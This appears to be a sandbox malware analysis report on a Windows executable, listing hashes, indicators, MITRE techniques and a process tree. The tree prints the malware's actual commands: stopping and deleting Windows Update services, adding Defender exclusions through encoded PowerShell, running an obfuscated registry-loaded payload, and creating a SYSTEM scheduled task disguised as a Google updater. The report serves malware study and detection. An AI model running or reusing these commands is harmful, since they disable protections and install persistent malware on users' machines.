b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

Analysis

max time kernel
150s
max time network
53s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
13-11-2022 17:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe
Size

2.7MB
MD5

5026ed09cc5a093093461066d16a8f30
SHA1

34d60b874d9d3f8841c721692ea1daf31f330653
SHA256

b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3
SHA512

2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1
SSDEEP

49152:HgJH+Kol630+0DW0TOWxKyuPcMPgBAnDEQ1o/40fyNHpElUZ7lPP:AJgl630pBTXVGhPYzQ1o//wElulH

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 1108 created 416	1108	powershell.EXE	3
PID 1608 created 416	1608	powershell.EXE	3

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
996	icacls.exe
1000	takeown.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Deletes itself 1 IoCs

pid	Process
692	cmd.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1000	takeown.exe
996	icacls.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1060 set thread context of 1224	1060	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe	60
PID 1108 set thread context of 1200	1108	powershell.EXE	76
PID 1608 set thread context of 2032	1608	powershell.EXE	77

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1688	sc.exe
1432	sc.exe
848	sc.exe
692	sc.exe
1516	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1256	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a036856887f7d801	powershell.EXE

Modifies registry key 1 TTPs 9 IoCs

Modify Registry

T1112

pid	Process
1092	reg.exe
1624	reg.exe
1880	reg.exe
1844	reg.exe
1784	reg.exe
1836	reg.exe
804	reg.exe
1928	reg.exe
1992	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
112	powershell.exe
1060	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe
1108	powershell.EXE
1608	powershell.EXE
1108	powershell.EXE
1200	dllhost.exe
1200	dllhost.exe
1200	dllhost.exe
1200	dllhost.exe
1608	powershell.EXE
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe
2032	dllhost.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	112	powershell.exe
Token: SeShutdownPrivilege	2016	powercfg.exe
Token: SeDebugPrivilege	1060	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe
Token: SeShutdownPrivilege	1476	powercfg.exe
Token: SeShutdownPrivilege	1808	powercfg.exe
Token: SeShutdownPrivilege	1676	powercfg.exe
Token: SeTakeOwnershipPrivilege	1000	takeown.exe
Token: SeDebugPrivilege	1108	powershell.EXE
Token: SeDebugPrivilege	1608	powershell.EXE
Token: SeDebugPrivilege	1108	powershell.EXE
Token: SeDebugPrivilege	1200	dllhost.exe
Token: SeDebugPrivilege	1608	powershell.EXE
Token: SeDebugPrivilege	2032	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1060 wrote to memory of 112	1060	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe	27
PID 1060 wrote to memory of 112	1060	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe	27
PID 1060 wrote to memory of 112	1060	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe	27
PID 1060 wrote to memory of 1896	1060	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe	29
PID 1060 wrote to memory of 1896	1060	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe	29
PID 1060 wrote to memory of 1896	1060	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe	29
PID 1060 wrote to memory of 1776	1060	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe	31
PID 1060 wrote to memory of 1776	1060	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe	31
PID 1060 wrote to memory of 1776	1060	b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe	31
PID 1896 wrote to memory of 1688	1896	cmd.exe	33
PID 1896 wrote to memory of 1688	1896	cmd.exe	33
PID 1896 wrote to memory of 1688	1896	cmd.exe	33
PID 1776 wrote to memory of 2016	1776	cmd.exe	34
PID 1776 wrote to memory of 2016	1776	cmd.exe	34
PID 1776 wrote to memory of 2016	1776	cmd.exe	34
PID 1896 wrote to memory of 1432	1896	cmd.exe	35
PID 1896 wrote to memory of 1432	1896	cmd.exe	35
PID 1896 wrote to memory of 1432	1896	cmd.exe	35
PID 1896 wrote to memory of 848	1896	cmd.exe	36
PID 1896 wrote to memory of 848	1896	cmd.exe	36
PID 1896 wrote to memory of 848	1896	cmd.exe	36
PID 1896 wrote to memory of 692	1896	cmd.exe	37
PID 1896 wrote to memory of 692	1896	cmd.exe	37
PID 1896 wrote to memory of 692	1896	cmd.exe	37
PID 1776 wrote to memory of 1476	1776	cmd.exe	38
PID 1776 wrote to memory of 1476	1776	cmd.exe	38
PID 1776 wrote to memory of 1476	1776	cmd.exe	38
PID 1896 wrote to memory of 1516	1896	cmd.exe	39
PID 1896 wrote to memory of 1516	1896	cmd.exe	39
PID 1896 wrote to memory of 1516	1896	cmd.exe	39
PID 1776 wrote to memory of 1808	1776	cmd.exe	40
PID 1776 wrote to memory of 1808	1776	cmd.exe	40
PID 1776 wrote to memory of 1808	1776	cmd.exe	40
PID 1896 wrote to memory of 1928	1896	cmd.exe	41
PID 1896 wrote to memory of 1928	1896	cmd.exe	41
PID 1896 wrote to memory of 1928	1896	cmd.exe	41
PID 1896 wrote to memory of 1992	1896	cmd.exe	42
PID 1896 wrote to memory of 1992	1896	cmd.exe	42
PID 1896 wrote to memory of 1992	1896	cmd.exe	42
PID 1896 wrote to memory of 1784	1896	cmd.exe	43
PID 1896 wrote to memory of 1784	1896	cmd.exe	43
PID 1896 wrote to memory of 1784	1896	cmd.exe	43
PID 1776 wrote to memory of 1676	1776	cmd.exe	44
PID 1776 wrote to memory of 1676	1776	cmd.exe	44
PID 1776 wrote to memory of 1676	1776	cmd.exe	44
PID 1896 wrote to memory of 1836	1896	cmd.exe	45
PID 1896 wrote to memory of 1836	1896	cmd.exe	45
PID 1896 wrote to memory of 1836	1896	cmd.exe	45
PID 1896 wrote to memory of 1092	1896	cmd.exe	46
PID 1896 wrote to memory of 1092	1896	cmd.exe	46
PID 1896 wrote to memory of 1092	1896	cmd.exe	46
PID 1896 wrote to memory of 1000	1896	cmd.exe	47
PID 1896 wrote to memory of 1000	1896	cmd.exe	47
PID 1896 wrote to memory of 1000	1896	cmd.exe	47
PID 1896 wrote to memory of 996	1896	cmd.exe	48
PID 1896 wrote to memory of 996	1896	cmd.exe	48
PID 1896 wrote to memory of 996	1896	cmd.exe	48
PID 1896 wrote to memory of 1624	1896	cmd.exe	49
PID 1896 wrote to memory of 1624	1896	cmd.exe	49
PID 1896 wrote to memory of 1624	1896	cmd.exe	49
PID 1896 wrote to memory of 804	1896	cmd.exe	50
PID 1896 wrote to memory of 804	1896	cmd.exe	50
PID 1896 wrote to memory of 804	1896	cmd.exe	50
PID 1896 wrote to memory of 1880	1896	cmd.exe	51

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:472

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c6228d6d-92ea-4a0e-94c0-118c878b5a66}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1200
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{8ee2224a-9d47-4a45-a93e-50cb85bd9512}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2032

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:480

C:\Users\Admin\AppData\Local\Temp\b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe
"C:\Users\Admin\AppData\Local\Temp\b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:112
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1896
- - C:\Windows\system32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1688
- - C:\Windows\system32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1432
- - C:\Windows\system32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:848
- - C:\Windows\system32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:692
- - C:\Windows\system32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1516
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
    3⤵
    - Modifies registry key
    PID:1928
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
    3⤵
    - Modifies registry key
    PID:1992
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
    3⤵
    - Modifies security service
    - Modifies registry key
    PID:1784
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
    3⤵
    - Modifies registry key
    PID:1836
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
    3⤵
    - Modifies registry key
    PID:1092
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1000
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:996
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
    3⤵
    - Modifies registry key
    PID:1624
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
    3⤵
    - Modifies registry key
    PID:804
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
    3⤵
    - Modifies registry key
    PID:1880
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
    3⤵
    - Modifies registry key
    PID:1844
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
    3⤵
    PID:392
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
    3⤵
    PID:1056
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
    3⤵
    PID:1124
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
    3⤵
    PID:1504
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
    3⤵
    PID:1144
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
    3⤵
    PID:844
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    3⤵
    PID:1596
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1776
- - C:\Windows\system32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2016
- - C:\Windows\system32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1476
- - C:\Windows\system32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1808
- - C:\Windows\system32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1676
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  - Drops file in Windows directory
  PID:1224
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
  2⤵
  PID:324
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
    3⤵
    - Creates scheduled task(s)
    PID:1256
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1540
- - C:\Windows\system32\schtasks.exe
    schtasks /run /tn "GoogleUpdateTaskMachineQC"
    3⤵
    PID:1928
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3.exe"
  2⤵
  - Deletes itself
  PID:692
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:1968

C:\Windows\system32\taskeng.exe
taskeng.exe {39462495-77B9-427D-A3FA-02F1316B9F90} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1108
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1608

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

memory/112-65-0x00000000028E4000-0x00000000028E7000-memory.dmp

Filesize
12KB

Download
memory/112-66-0x00000000028EB000-0x000000000290A000-memory.dmp

Filesize
124KB

Download
memory/112-62-0x000007FEED0E0000-0x000007FEEDC3D000-memory.dmp

Filesize
11.4MB

Download
memory/112-64-0x00000000028E4000-0x00000000028E7000-memory.dmp

Filesize
12KB

Download
memory/112-63-0x000000001B740000-0x000000001BA3F000-memory.dmp

Filesize
3.0MB

Download
memory/416-147-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmp

Filesize
64KB

Download
memory/416-184-0x00000000007E0000-0x000000000080A000-memory.dmp

Filesize
168KB

Download
memory/416-155-0x0000000000730000-0x0000000000753000-memory.dmp

Filesize
140KB

Download
memory/416-156-0x00000000007E0000-0x000000000080A000-memory.dmp

Filesize
168KB

Download
memory/416-144-0x0000000000730000-0x0000000000753000-memory.dmp

Filesize
140KB

Download
memory/416-148-0x00000000371A0000-0x00000000371B0000-memory.dmp

Filesize
64KB

Download
memory/464-154-0x00000000371A0000-0x00000000371B0000-memory.dmp

Filesize
64KB

Download
memory/464-185-0x00000000009C0000-0x00000000009EA000-memory.dmp

Filesize
168KB

Download
memory/464-151-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmp

Filesize
